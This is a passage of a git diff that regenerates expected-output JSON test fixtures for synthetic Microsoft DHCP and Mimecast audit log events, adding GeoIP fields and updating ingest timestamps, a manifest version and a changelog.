"2021-06-09T11:57:25.990897400Z" + "ingested": "2021-12-14T14:48:14.226951563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5663-11025: 11025,1/19/19,1:25:23,ano,10.175.103.215,aturve1647.mail.localhost,uunturm,temUte,sit,olab", "event": { - "ingested": "2021-06-09T11:57:25.990901Z" + "ingested": "2021-12-14T14:48:14.226951919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6672-12: 12,2/2/19,8:27:57,enderi,10.236.150.115,umwrit5433.www5.domain,01:00:5e:ba:09:4a,tpersp", "event": { - "ingested": "2021-06-09T11:57:25.990906300Z" + "ingested": "2021-12-14T14:48:14.226953653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6797-01: 01,2/17/19,3:30:32,oeni,10.223.90.192,llamco7206.www.home,01:00:5e:8f:35:71,orsit,asiar,ise,itau,apariat", "event": { - "ingested": "2021-06-09T11:57:25.990910200Z" + 
"ingested": "2021-12-14T14:48:14.226954061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4494-51: 51,3/3/19,10:33:06,dolore,10.165.192.48,nBCSedut1502.www5.example,01:00:5e:c7:c2:10,odoconse,emp,pisciv,lumdolor,nonp,labo,ulapar,aboreetd,hilm,llitanim,invo", "event": { - "ingested": "2021-06-09T11:57:25.990914200Z" + "ingested": "2021-12-14T14:48:14.226954415Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7205-50: 50,3/17/19,5:35:40,ama,10.80.152.108,texpli2782.mail.domain,01:00:5e:27:0a:9d,", "event": { - "ingested": "2021-06-09T11:57:25.990917700Z" + "ingested": "2021-12-14T14:48:14.226954775Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5224-11011: 11011,4/1/19,12:38:14,liqua,10.192.21.74,aco6894.mail.home,emUteni,rum,gnaaliqu,teirured", "event": { - "ingested": "2021-06-09T11:57:25.990921600Z" + "ingested": "2021-12-14T14:48:14.226955138Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5608-11019: 11019,4/15/19,7:40:49,bor,10.142.25.100,tetu2485.internal.invalid,nby,mve,osqui,sequat", "event": { - "ingested": "2021-06-09T11:57:25.990925300Z" + "ingested": "2021-12-14T14:48:14.226955492Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3051-1098: 1098,4/29/19,2:43:23,ven,10.162.114.217,doloreme60.www5.localhost,evitaed,inimveni,dex,lor", "event": { - "ingested": "2021-06-09T11:57:25.990928800Z" + "ingested": "2021-12-14T14:48:14.226955844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2315-01: 
01,5/13/19,9:45:57,amcorp,10.57.57.241,liqua6498.api.invalid,01:00:5e:d8:53:15,iduntu,ccaeca,niamq,lapariat,remagn,mquae,consequa,moenimi,olupt,oconsequ,edquiac", "event": { - "ingested": "2021-06-09T11:57:25.990932400Z" + "ingested": "2021-12-14T14:48:14.226956193Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2690-14: 14,5/28/19,4:48:31,quamest,10.152.28.171,rsita2628.www5.local,01:00:5e:7a:4c:6e,miu", "event": { - "ingested": "2021-06-09T11:57:25.990935900Z" + "ingested": "2021-12-14T14:48:14.226956545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6444-11001: 11001,6/11/19,11:51:06,mex,10.0.132.176,luptat7214.domain,lillum,remips,uisaute,imide", "event": { - "ingested": "2021-06-09T11:57:25.990939300Z" + "ingested": "2021-12-14T14:48:14.226956899Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7037-11: 11,6/25/19,6:53:40,itesseq,10.125.134.213,tpersp2624.mail.example,01:00:5e:0b:fb:4a", "event": { - "ingested": "2021-06-09T11:57:25.990942500Z" + "ingested": "2021-12-14T14:48:14.226957258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6392-64: 64,7/10/19,1:56:14,mvolu,10.206.96.56,aincidu2687.mail.home,01:00:5e:80:9d:2c,", "event": { - "ingested": "2021-06-09T11:57:25.990946200Z" + "ingested": "2021-12-14T14:48:14.226957627Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5524-1098: 1098,7/24/19,8:58:48,lupta,10.22.187.69,amcor5091.internal.corp,nbyCi,tevel,usc,rem", "event": { - "ingested": "2021-06-09T11:57:25.990949600Z" + "ingested": "2021-12-14T14:48:14.226957988Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1978-11019: 11019,8/7/19,4:01:23,atisund,10.2.128.234,ncidid5410.internal.domain,velite,teturad,perspici,itation", "event": { - "ingested": "2021-06-09T11:57:25.990953200Z" + "ingested": "2021-12-14T14:48:14.226958345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5469-11024: 11024,8/21/19,11:03:57,porincid,10.223.160.140,nofd988.api.example,ilmol,eri,quunt,olori", "event": { - "ingested": "2021-06-09T11:57:25.990956700Z" + "ingested": "2021-12-14T14:48:14.226958844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2-11004: 11004,9/5/19,6:06:31,elit,10.137.14.180,borisnis6159.www5.localdomain,inven,eufugi,accusant,onse", "event": { - "ingested": "2021-06-09T11:57:25.990960200Z" + "ingested": "2021-12-14T14:48:14.226959344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2859-59: 59,9/19/19,1:09:05,inibu,10.106.93.26,isetquas3096.home,01:00:5e:1b:92:a6", "event": { - "ingested": "2021-06-09T11:57:25.990963700Z" + "ingested": "2021-12-14T14:48:14.226959934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4924-11025: 11025,10/3/19,8:11:40,periam,10.192.182.230,dminima4348.mail.home,tame,naaliq,nte,ulpa", "event": { - "ingested": "2021-06-09T11:57:25.990967200Z" + "ingested": "2021-12-14T14:48:14.226960376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1738-25: 
25,10/18/19,3:14:14,loi,10.24.111.229,volupt2952.api.local,01:00:5e:64:62:d1,sequat,giatquov,tconsec,miurerep,toccaec,fugi,labo,nostrud,gnaal,qui,cupi", "event": { - "ingested": "2021-06-09T11:57:25.990970800Z" + "ingested": "2021-12-14T14:48:14.226960746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5282-60: 60,11/1/19,10:16:48,lores,10.45.253.103,uii5923.internal.home,01:00:5e:2f:ff:49,rcit,llamco,atu,untincul,ssecil", "event": { - "ingested": "2021-06-09T11:57:25.990974200Z" + "ingested": "2021-12-14T14:48:14.226961104Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3023-11023: 11023,11/15/19,5:19:22,atise,10.95.241.28,oluptas6981.www5.localhost,lor,Sedut,yCiceroi,quunt", "event": { - "ingested": "2021-06-09T11:57:25.990977700Z" + "ingested": "2021-12-14T14:48:14.226961485Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4890-23: 23,11/30/19,12:21:57,dolore,10.84.32.178,vitaed4959.example,01:00:5e:11:45:1e,itaedict", "event": { - "ingested": "2021-06-09T11:57:25.990981800Z" + "ingested": "2021-12-14T14:48:14.226961907Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4271-55: 55,12/14/19,7:24:31,ruredo,10.72.196.74,boreetdo1725.example,01:00:5e:01:2f:7d", "event": { - "ingested": "2021-06-09T11:57:25.990985700Z" + "ingested": "2021-12-14T14:48:14.226962266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/microsoft/manifest.yml b/packages/microsoft/manifest.yml index fbb48ce9f13..675f307289b 100644 --- a/packages/microsoft/manifest.yml +++ b/packages/microsoft/manifest.yml 
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: microsoft
 title: Microsoft
-version: 1.1.0
+version: 1.1.1
 description: Deprecated. Use a specific Microsoft package instead.
 categories:
   - "network"
diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml
index 87d46bf2d0e..6f5a62d3c11 100644
--- a/packages/mimecast/changelog.yml
+++ b/packages/mimecast/changelog.yml
@@ -1,3 +1,8 @@
+- version: "0.0.4"
+  changes:
+    - description: Regenerate test files using the new GeoIP database
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2339
 - version: "0.0.3"
   changes:
     - description: Change test public IPs to the supported subset
diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json
index f11c9833871..0e873498751 100644
--- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json
+++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json
@@ -19,11 +19,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-12-09T15:16:03.637458Z", + "ingested": "2021-12-14T14:48:19.342442297Z", "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}", "id": "eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48", "created": "2021-10-18T08:45:02.000Z" 
@@ -61,11 +73,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-12-09T15:16:03.637467Z", + "ingested": "2021-12-14T14:48:19.342444278Z", "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70", "created": "2021-10-10T22:51:57.000Z" 
@@ -99,11 +123,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-12-09T15:16:03.637473400Z", + "ingested": "2021-12-14T14:48:19.342444686Z", "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A", "created": "2021-10-11T07:17:30.000Z" 
@@ -137,11 +173,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "logon-requires-challenge", - "ingested": "2021-12-09T15:16:03.637479400Z", + "ingested": "2021-12-14T14:48:19.342445056Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60", "created": "2021-10-11T07:17:26.000Z" 
@@ -175,11 +223,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-12-09T15:16:03.637485300Z", + "ingested": "2021-12-14T14:48:19.342445417Z", "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "created": "2021-10-11T06:03:38.000Z" 
@@ -213,11 +273,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-12-09T15:16:03.637491300Z", + "ingested": "2021-12-14T14:48:19.342445779Z", "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "created": "2021-10-11T16:39:17.000Z" 
@@ -251,11 +323,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-12-09T15:16:03.637497300Z", + "ingested": "2021-12-14T14:48:19.342446134Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK", "created": "2021-10-19T12:46:40.000Z" @@ -289,11 +373,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "message-action", - "ingested": "2021-12-09T15:16:03.637503100Z", + "ingested": "2021-12-14T14:48:19.342446500Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, 
From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8", "created": "2021-10-11T15:36:01.000Z" @@ -338,11 +434,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "search-action", - "ingested": "2021-12-09T15:16:03.637509100Z", + "ingested": "2021-12-14T14:48:19.342446860Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw", "created": "2021-10-11T15:35:53.000Z" 
@@ -376,11 +484,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "logon-authentication-failed", - "ingested": "2021-12-09T15:16:03.637515300Z", + "ingested": "2021-12-14T14:48:19.342447313Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M" }, 
@@ -414,7 +534,7 @@ }, "event": { "action": "completed-directory-sync", - "ingested": "2021-12-09T15:16:03.637519200Z", + "ingested": "2021-12-14T14:48:19.342447674Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys\",\"auditType\":\"Completed Directory Sync\",\"user\":\"\",\"eventTime\":\"2021-10-11T13:21:06+0000\",\"eventInfo\":\"No changes found.\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys" }, @@ -444,11 +564,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "case-action", - "ingested": "2021-12-09T15:16:03.637524500Z", + "ingested": "2021-12-14T14:48:19.342448171Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo", "created": "2021-10-12T09:19:53.000Z" 
